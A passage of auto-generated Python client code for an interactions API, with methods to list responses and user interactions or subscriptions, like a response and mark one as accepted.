responses by interactionId Returns the list of responses by interactionId This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_responses(interaction_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponseList If the method is called asynchronously, returns the request thread. 
""" kwargs['_return_http_data_only'] = True if kwargs.get('callback'): return self.get_responses_with_http_info(interaction_id, start, end, requester_id, client_token, **kwargs) else: (data) = self.get_responses_with_http_info(interaction_id, start, end, requester_id, client_token, **kwargs) return data def get_responses_with_http_info(self, interaction_id, start, end, requester_id, client_token, **kwargs): """ Get list of responses by interactionId Returns the list of responses by interactionId This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please define a `callback` function to be invoked when receiving the response. >>> def callback_function(response): >>> pprint(response) >>> >>> thread = api.get_responses_with_http_info(interaction_id, start, end, requester_id, client_token, callback=callback_function) :param callback function: The callback function for asynchronous request. (optional) :param int interaction_id: interactionId (required) :param int start: start, initial value start from 0 (required) :param int end: end (required) :param str requester_id: requesterId can be user id OR email address. (required) :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required) :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */ :param str access_token: Unique session token for user. To get access token user will have to authenticate :return: VerveResponseInteractionResponseList If the method is called asynchronously, returns the request thread. 
""" all_params = ['interaction_id', 'start', 'end', 'requester_id', 'client_token', 'fields', 'access_token'] all_params.append('callback') all_params.append('_return_http_data_only') params = locals() for key, val in iteritems(params['kwargs']): if key not in all_params: raise TypeError( "Got an unexpected keyword argument '%s'" " to method get_responses" % key ) params[key] = val del params['kwargs'] # verify the required parameter 'interaction_id' is set if ('interaction_id' not in params) or (params['interaction_id'] is None): raise ValueError("Missing the required parameter `interaction_id` when calling `get_responses`") # verify the required parameter 'start' is set if ('start' not in params) or (params['start'] is None): raise ValueError("Missing the required parameter `start` when calling `get_responses`") # verify the required parameter 'end' is set if ('end' not in params) or (params['end'] is None): raise ValueError("Missing the required parameter `end` when calling `get_responses`") # verify the required parameter 'requester_id' is set if ('requester_id' not in params) or (params['requester_id'] is None): raise ValueError("Missing the required parameter `requester_id` when calling `get_responses`") # verify the required parameter 'client_token' is set if ('client_token' not in params) or (params['client_token'] is None): raise ValueError("Missing the required parameter `client_token` when calling `get_responses`") resource_path = '/interactions/{interactionId}/responses'.replace('{format}', 'json') path_params = {} if 'interaction_id' in params: path_params['interactionId'] = params['interaction_id'] query_params = {} if 'start' in params: query_params['start'] = params['start'] if 'end' in params: query_params['end'] = params['end'] if 'fields' in params: query_params['fields'] = params['fields'] header_params = {} if 'requester_id' in params: header_params['requesterId'] = params['requester_id'] if 'access_token' in params: 
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        form_params = []
        local_var_files = {}
        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionResponseList',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def get_user_interactions(self, user_id, interaction_status, start, end, requester_id, client_token, **kwargs):
        """
        Get list of interactions shared by user
        Returns the list of interactions shared by specific user
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_user_interactions(user_id, interaction_status, start, end, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int user_id: userId whose shared interactions want to get (required)
        :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required)
        :param int start: start, initial value start from 0 (required)
        :param int end: end (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param int category_id: categoryId
        :param str interaction_type: Interaction Type
        :param str association: association
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: delegate to the *_with_http_info variant and
        # strip the extra HTTP metadata from the synchronous return value.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_user_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, **kwargs)
        else:
            (data) = self.get_user_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, **kwargs)
            return data

    def get_user_interactions_with_http_info(self, user_id, interaction_status, start, end, requester_id, client_token, **kwargs):
        """
        Get list of interactions shared by user
        Returns the list of interactions shared by specific user
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_user_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int user_id: userId whose shared interactions want to get (required)
        :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required)
        :param int start: start, initial value start from 0 (required)
        :param int end: end (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param int category_id: categoryId
        :param str interaction_type: Interaction Type
        :param str association: association
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['user_id', 'interaction_status', 'start', 'end', 'requester_id', 'client_token', 'category_id', 'interaction_type', 'association', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Merge positional arguments (via locals()) with validated kwargs.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_user_interactions" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'user_id' is set
        if ('user_id' not in params) or (params['user_id'] is None):
            raise ValueError("Missing the required parameter `user_id` when calling `get_user_interactions`")
        # verify the required parameter 'interaction_status' is set
        if ('interaction_status' not in params) or (params['interaction_status'] is None):
            raise ValueError("Missing the required parameter `interaction_status` when calling `get_user_interactions`")
        # verify the required parameter 'start' is set
        if ('start' not in params) or (params['start'] is None):
            raise ValueError("Missing the required parameter `start` when calling `get_user_interactions`")
        # verify the required parameter 'end' is set
        if ('end' not in params) or (params['end'] is None):
            raise ValueError("Missing the required parameter `end` when calling `get_user_interactions`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `get_user_interactions`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `get_user_interactions`")

        resource_path = '/interactions/{userId}/shared'.replace('{format}', 'json')
        path_params = {}
        if 'user_id' in params:
            path_params['userId'] = params['user_id']

        query_params = {}
        if 'interaction_status' in params:
            query_params['interactionStatus'] = params['interaction_status']
        if 'category_id' in params:
            query_params['categoryId'] = params['category_id']
        if 'interaction_type' in params:
            query_params['interactionType'] = params['interaction_type']
        if 'association' in params:
            query_params['association'] = params['association']
        if 'start' in params:
            query_params['start'] = params['start']
        if 'end' in params:
            query_params['end'] = params['end']
        if 'fields' in params:
            query_params['fields'] = params['fields']

        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        form_params = []
        local_var_files = {}
        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionList',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def get_user_subscribed_interaction_categories(self, user_id, start, end, requester_id, client_token, **kwargs):
        """
        Get list of interaction categories subscribed by the user
        Returns the list of interaction categories subscribed by the user
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_user_subscribed_interaction_categories(user_id, start, end, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int user_id: User Id whose subscribed category want to get (required)
        :param int start: start, initial value start from 0 (required)
        :param int end: end (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str interaction_type: interactionType
        :param str association: association
        :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionCategoryList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: delegate to the *_with_http_info variant and
        # strip the extra HTTP metadata from the synchronous return value.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_user_subscribed_interaction_categories_with_http_info(user_id, start, end, requester_id, client_token, **kwargs)
        else:
            (data) = self.get_user_subscribed_interaction_categories_with_http_info(user_id, start, end, requester_id, client_token, **kwargs)
            return data

    def get_user_subscribed_interaction_categories_with_http_info(self, user_id, start, end, requester_id, client_token, **kwargs):
        """
        Get list of interaction categories subscribed by the user
        Returns the list of interaction categories subscribed by the user
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_user_subscribed_interaction_categories_with_http_info(user_id, start, end, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int user_id: User Id whose subscribed category want to get (required)
        :param int start: start, initial value start from 0 (required)
        :param int end: end (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str interaction_type: interactionType
        :param str association: association
        :param str fields: Filter fields in result list /* **A) Default values -** 1)categoryId 2)categoryName 3)interactionType **A) Available values -** 1)categoryId 2)categoryName 3)categoryDescription 4)createdDate 5)isSubscribed 6)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionCategoryList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['user_id', 'start', 'end', 'requester_id', 'client_token', 'interaction_type', 'association', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Merge positional arguments (via locals()) with validated kwargs.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_user_subscribed_interaction_categories" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'user_id' is set
        if ('user_id' not in params) or (params['user_id'] is None):
            raise ValueError("Missing the required parameter `user_id` when calling `get_user_subscribed_interaction_categories`")
        # verify the required parameter 'start' is set
        if ('start' not in params) or (params['start'] is None):
            raise ValueError("Missing the required parameter `start` when calling `get_user_subscribed_interaction_categories`")
        # verify the required parameter 'end' is set
        if ('end' not in params) or (params['end'] is None):
            raise ValueError("Missing the required parameter `end` when calling `get_user_subscribed_interaction_categories`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `get_user_subscribed_interaction_categories`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `get_user_subscribed_interaction_categories`")

        resource_path = '/interactions/categories/{userId}/subscribe'.replace('{format}', 'json')
        path_params = {}
        if 'user_id' in params:
            path_params['userId'] = params['user_id']

        query_params = {}
        if 'interaction_type' in params:
            query_params['interactionType'] = params['interaction_type']
        if 'association' in params:
            query_params['association'] = params['association']
        if 'start' in params:
            query_params['start'] = params['start']
        if 'end' in params:
            query_params['end'] = params['end']
        if 'fields' in params:
            query_params['fields'] = params['fields']

        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        form_params = []
        local_var_files = {}
        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionCategoryList',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def get_user_subscribed_interactions(self, user_id, interaction_status, start, end, requester_id, client_token, **kwargs):
        """
        Get list of interactions subscribed by user
        Returns the list of interactions subscribed by specific user
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_user_subscribed_interactions(user_id, interaction_status, start, end, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int user_id: User Id whose subscribed interactions wants to get (required)
        :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required)
        :param int start: start, initial value start from 0 (required)
        :param int end: end (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param int category_id: categoryId
        :param str interaction_type: Interaction Type
        :param str association: association
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: delegate to the *_with_http_info variant and
        # strip the extra HTTP metadata from the synchronous return value.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.get_user_subscribed_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, **kwargs)
        else:
            (data) = self.get_user_subscribed_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, **kwargs)
            return data

    def get_user_subscribed_interactions_with_http_info(self, user_id, interaction_status, start, end, requester_id, client_token, **kwargs):
        """
        Get list of interactions subscribed by user
        Returns the list of interactions subscribed by specific user
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.get_user_subscribed_interactions_with_http_info(user_id, interaction_status, start, end, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int user_id: User Id whose subscribed interactions wants to get (required)
        :param str interaction_status: /* Interaction status 1) ALL 2) UNREPLIED 3) REPLIED 4) CLOSED */ (required)
        :param int start: start, initial value start from 0 (required)
        :param int end: end (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param int category_id: categoryId
        :param str interaction_type: Interaction Type
        :param str association: association
        :param str fields: Filter fields in result list /* **A) Default values -** 1)interactionId 2)interactionTitle 3)interactionDescription 4)createdDate 5)interactionType **A) Available values-** 1)interactionId 2)interactionTitle 3)interactionDescription 4)issuer 5)noOfResponses 6)isClosed 7)createdDate 8)lastUpdatedDate 9)videoId 10)fileURL 11)isSubscribed 12)sentiment 13)entity 14)interactionType 15)categoryId 16)categoryName */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionList
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['user_id', 'interaction_status', 'start', 'end', 'requester_id', 'client_token', 'category_id', 'interaction_type', 'association', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Merge positional arguments (via locals()) with validated kwargs.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_user_subscribed_interactions" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'user_id' is set
        if ('user_id' not in params) or (params['user_id'] is None):
            raise ValueError("Missing the required parameter `user_id` when calling `get_user_subscribed_interactions`")
        # verify the required parameter 'interaction_status' is set
        if ('interaction_status' not in params) or (params['interaction_status'] is None):
            raise ValueError("Missing the required parameter `interaction_status` when calling `get_user_subscribed_interactions`")
        # verify the required parameter 'start' is set
        if ('start' not in params) or (params['start'] is None):
            raise ValueError("Missing the required parameter `start` when calling `get_user_subscribed_interactions`")
        # verify the required parameter 'end' is set
        if ('end' not in params) or (params['end'] is None):
            raise ValueError("Missing the required parameter `end` when calling `get_user_subscribed_interactions`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `get_user_subscribed_interactions`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `get_user_subscribed_interactions`")

        resource_path = '/interactions/{userId}/subscribe'.replace('{format}', 'json')
        path_params = {}
        if 'user_id' in params:
            path_params['userId'] = params['user_id']

        query_params = {}
        if 'interaction_status' in params:
            query_params['interactionStatus'] = params['interaction_status']
        if 'category_id' in params:
            query_params['categoryId'] = params['category_id']
        if 'interaction_type' in params:
            query_params['interactionType'] = params['interaction_type']
        if 'association' in params:
            query_params['association'] = params['association']
        if 'start' in params:
            query_params['start'] = params['start']
        if 'end' in params:
            query_params['end'] = params['end']
        if 'fields' in params:
            query_params['fields'] = params['fields']

        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        form_params = []
        local_var_files = {}
        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionList',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def like_response(self, interaction_id, response_id, requester_id, client_token, **kwargs):
        """
        Like response
        Allows the user to like the response.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.like_response(interaction_id, response_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param int response_id: responseId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: delegate to the *_with_http_info variant and
        # strip the extra HTTP metadata from the synchronous return value.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.like_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs)
        else:
            (data) = self.like_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs)
            return data

    def like_response_with_http_info(self, interaction_id, response_id, requester_id, client_token, **kwargs):
        """
        Like response
        Allows the user to like the response.
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.like_response_with_http_info(interaction_id, response_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param int response_id: responseId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['interaction_id', 'response_id', 'requester_id', 'client_token', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Merge positional arguments (via locals()) with validated kwargs.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method like_response" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'interaction_id' is set
        if ('interaction_id' not in params) or (params['interaction_id'] is None):
            raise ValueError("Missing the required parameter `interaction_id` when calling `like_response`")
        # verify the required parameter 'response_id' is set
        if ('response_id' not in params) or (params['response_id'] is None):
            raise ValueError("Missing the required parameter `response_id` when calling `like_response`")
        # verify the required parameter 'requester_id' is set
        if ('requester_id' not in params) or (params['requester_id'] is None):
            raise ValueError("Missing the required parameter `requester_id` when calling `like_response`")
        # verify the required parameter 'client_token' is set
        if ('client_token' not in params) or (params['client_token'] is None):
            raise ValueError("Missing the required parameter `client_token` when calling `like_response`")

        resource_path = '/interactions/{interactionId}/responses/{responseId}/like'.replace('{format}', 'json')
        path_params = {}
        if 'interaction_id' in params:
            path_params['interactionId'] = params['interaction_id']
        if 'response_id' in params:
            path_params['responseId'] = params['response_id']

        query_params = {}

        header_params = {}
        if 'requester_id' in params:
            header_params['requesterId'] = params['requester_id']
        if 'access_token' in params:
            header_params['accessToken'] = params['access_token']
        if 'client_token' in params:
            header_params['clientToken'] = params['client_token']

        form_params = []
        local_var_files = {}
        # `fields` travels as form data on this POST endpoint, not as a query parameter
        if 'fields' in params:
            form_params.append(('fields', params['fields']))

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/x-www-form-urlencoded'])

        # Authentication setting
        auth_settings = ['default']

        return self.api_client.call_api(resource_path, 'POST',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='VerveResponseInteractionResponse',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'))

    def mark_as_an_response(self, interaction_id, response_id, requester_id, client_token, **kwargs):
        """
        Mark response as a response
        Marks the response as accepted. This means the user is satisfied with the response & then the interaction will go into closed state
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.mark_as_an_response(interaction_id, response_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param int response_id: responseId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Convenience wrapper: delegate to the *_with_http_info variant and
        # strip the extra HTTP metadata from the synchronous return value.
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.mark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs)
        else:
            (data) = self.mark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, **kwargs)
            return data

    def mark_as_an_response_with_http_info(self, interaction_id, response_id, requester_id, client_token, **kwargs):
        """
        Mark response as a response
        Marks the response as accepted. This means the user is satisfied with the response & then the interaction will go into closed state
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.mark_as_an_response_with_http_info(interaction_id, response_id, requester_id, client_token, callback=callback_function)

        :param callback function: The callback function for asynchronous request. (optional)
        :param int interaction_id: interactionId (required)
        :param int response_id: responseId (required)
        :param str requester_id: requesterId can be user id OR email address. (required)
        :param str client_token: Use the Client Token. Please generate it from the Applications section under the Production & Sandbox tabs (required)
        :param str fields: Filter fields in result list /* **A) Default values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionType **A) Available values -** 1)responseId 2)responseDescription 3)createdDate 4)interactionId 5)respondingUser 6)isMarkedResponse 7)noOfLikes 8)noOfDislikes 9)replyCount 10)isLiked 11)isDisliked 12)interactionType */
        :param str access_token: Unique session token for user. To get access token user will have to authenticate
        :return: VerveResponseInteractionResponse
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['interaction_id', 'response_id', 'requester_id', 'client_token', 'fields', 'access_token']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        # Merge positional arguments (via locals()) with validated kwargs.
        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method mark_as_an_response" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'interaction_id' is set
